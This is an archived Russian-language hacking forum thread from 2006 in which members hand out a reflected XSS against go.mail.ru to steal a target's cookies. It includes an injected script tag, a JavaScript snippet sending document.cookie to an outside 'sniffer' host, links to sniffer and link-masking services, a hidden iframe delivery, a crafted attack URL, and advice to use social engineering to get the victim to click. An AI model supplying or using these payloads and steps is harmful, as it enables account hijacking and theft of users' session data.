PDA

Просмотр полной версии : Xss на mail.ru


em00s7
25.05.2006, 20:05
Подкиньте пожалуста Xss на mail.ru зарание спасибо=)

Go0o$E
25.05.2006, 20:33
А на go.mail.ru нормально будет 8) В Баги на сайтах кинул. Вот - http://forum.antichat.ru/showthread.php?p=155788#post155788

em00s7
25.05.2006, 20:36
Профиксили уже =(

Go0o$E
25.05.2006, 20:40
Какое пофиксили!? Пробелы все в ссылке убери.

em00s7
25.05.2006, 21:10
Go0o$E спасибо объясните плиз как её использовать ?? чтобы украсть куки

GreenBear
25.05.2006, 22:21
Для ознакомления:
https://forum.antichat.ru/thread18719.html

Чтобы куки украсть достаточно в уязвимом параметре написать:
<srcipt src=http://site.ru/js.js></script>
В самом файле js.js

img = new Image();
img.src = "http://sniffer/sn.php?"+document.cookie;

Этот способ хорош тем, что работает даже там, где фильтруються ковычки.

Зарегить сниффер можно на http://antichat.org/sniffer or http://s.netsec.ru/
Замаскировать линк можно http://loc.netsec.ru/
Но лучше делать в ифрейме, например

<iframe src="http://site.ru/?para=<script src=http://site.ru/js.js></script>" frameborder="0" widht="0" height="0">

Что не понятно - спрашивай.

em00s7
25.05.2006, 22:59
Green_Bear в спасибо огромное)) я уж думал что ппц

Sn@k3
30.05.2006, 00:37
А как же это:
ВНИМАНИЕ!
Данное письмо содержит потенциально опасный HTML-код,
заблокированный автоматической системой безопасности.

iframe - неработает, думаю прокатить тока не в майл ру, а напрример на гмайл ит.д.

GreenBear
30.05.2006, 08:14
А как же это:
ВНИМАНИЕ!
Данное письмо содержит потенциально опасный HTML-код,
заблокированный автоматической системой безопасности.

iframe - неработает, думаю прокатить тока не в майл ру, а напрример на гмайл ит.д.
Додумался, я дал пример использования пассивной ксс, а не в теле письма его присылать :)

*Van*
30.05.2006, 15:01
em00s7, ты должен отослать тому челу, которого хочешь взломать такую ссылку:

http://go.mail.ru/search?lfilter=y&q=%25CF%25F1%25E8%25F5%25EE%25EB%25EE%25E3%25E8%25 %20%20FF%2B%25F1%25EE%25E1%25E0%25EA%2B%253C%253C% 2Burl%%20%20253D%2522www%2Edogcatalog%2Enet%252F%2 A%2522&num=10&as_q=1&old_q=%25F1%25E0%25E9%25F2%25EE%25E2%2B%25F1%25EE% %20%2025E7%25E4%25E0%25ED%25E8%25E5&surl=%3Cscript src=http://site.ru/js.js%3E%3C/script%3E

Ну и применить СИ, чтобы он её открыл.

Что делать с http://site.ru/js.js, объяснил Green_Bear.

em00s7
01.06.2006, 17:22
а активной у вас нету??

Sirko
06.06.2006, 16:43
Green_Bear]Для ознакомления:
https://forum.antichat.ru/thread18719.html

Чтобы куки украсть достаточно в уязвимом параметре написать:
<srcipt src=http://site.ru/js.js></script>

Непонятно в каком параметре????

В самом файле js.js

img = new Image();
img.src = "http://sniffer/sn.php?"+document.cookie;


Это надо создать файл и положить на сервак где выполняются скрипты??

Этот способ хорош тем, что работает даже там, где фильтруються ковычки.

Зарегить сниффер можно на http://antichat.org/sniffer or http://s.netsec.ru/
Замаскировать линк можно http://loc.netsec.ru/
Но лучше делать в ифрейме, например

<iframe src="http://site.ru/?para=<script src=http://site.ru/js.js></script>" frameborder="0" widht="0" height="0">


И куда этот инфрейм вставлвть???
Толке не говорите в Ж.... :confused:

*Van*
06.06.2006, 21:33
Непонятно в каком параметре????


Например в данной xss уязвимый параметр surl

http://go.mail.ru/search?lfilter=y&q=%25CF%25F1%25E8%25F5%25EE%25EB%25EE%25E3%25E8%25 %20%20FF%2B%25F1%25EE%25E1%25E0%25EA%2B%253C%253C% 2Burl%%20%20253D%2522www%2Edogcatalog%2Enet%252F%2 A%2522&num=10&as_q=1&old_q=%25F1%25E0%25E9%25F2%25EE%25E2%2B%25F1%25EE% %20%2025E7%25E4%25E0%25ED%25E8%25E5&surl=%3Cscript src=http://site.ru/js.js%3E%3C/script%3E



Это надо создать файл и положить на сервак где выполняются скрипты??

Да.


И куда этот инфрейм вставлвть???
Толке не говорите в Ж.... :confused:

В поле сообщения. Не забудь отослать в формате HTML.

Sirko
06.06.2006, 22:07
http://go.mail.ru/search?lfilter=y&q=%25CF%25F1%25E8%25F5%25EE%25EB%25EE%25E3%25E8%25 %20%20FF%2B%25F1%25EE%25E1%25E0%25EA%2B%253C%253C% 2Burl%%20%20253D%2522www%2Edogcatalog%2Enet%252F%2 A%2522&num=10&as_q=1&old_q=%25F1%25E0%25E9%25F2%25EE%25E2%2B%25F1%25EE% %20%2025E7%25E4%25E0%25ED%25E8%25E5&surl=%3Cscript src=http://site.ru/js.js%3E%3C/script%3E

А это куда???

volone
08.06.2006, 00:38
а прокси обязательно использовать ?